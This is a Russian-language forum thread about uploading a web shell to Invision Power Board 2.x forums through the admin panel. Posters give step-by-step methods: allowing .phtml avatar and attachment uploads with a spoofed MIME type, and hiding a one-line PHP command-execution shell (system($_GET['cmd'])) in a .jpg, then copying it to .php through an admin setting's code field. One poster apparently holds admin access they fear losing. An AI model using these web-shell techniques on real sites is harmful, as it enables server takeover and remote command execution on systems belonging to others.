Заливка шелла в Ipb 2.*.* Вроде бы довольно частый вопрос о том, как заливать шелл в ipb 2.0.* и 2.1.* Ну вот, сразу что пришло в голову, проверить на глупость =)) Разрешить в профиле загружать файлы пхп, пришол облом, они становились файлами notepad =( Думаю я, думаю, а ведь пхп и пхтмл одно и тоже =)) иду в настройки и пишу в главной конфигурации\профиль пользователей\аватары в конце ,pthml После иду в атачи и делаю там еще один тип - .phtml mime тип пишем от пхп файлов, то есть application/octet-stream ок. разрешаем. идем в профиль, грузим аватар, смотрим к нему путь - и там наш шел, av-1.phtml =)) ВОт и все.
Такая же проблема, залил в виде phtml, но шелл не запускается а выдает исходник, что делать то? как запускать, что надо изменить в начале и в конце php чтобы phtml заработал?
Ребят , пытаюсь через смайлы залить пишет:мона типа тока изображ gif ,jpg и тд , пытался через phtml тоже отшило как еще залить можно ?
предлагаю ещё способ: заливаем файл .jpg например с таким содержанием PHP: <? system($_GET['cmd'])?> идём в админку, настройки, выбираем любую, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки": пишем copy('/home/www/forum/uploads/av.jpg','/home/www/forum/uploads/av.php').
Для этого необходимо ещё знать путь к директории с форумом. Такой вопрос: будет ли рабоать шелл, если его залить как *.gif, а в админке прописать mime-тип для расширения gif как application/octet-stream ?
Мужики что делать? Пишет мол фаил с аватором слишком большой? А админка на английском, немогу понять что к чему, помогить плиз пока меня там нафиг неудалили из админки!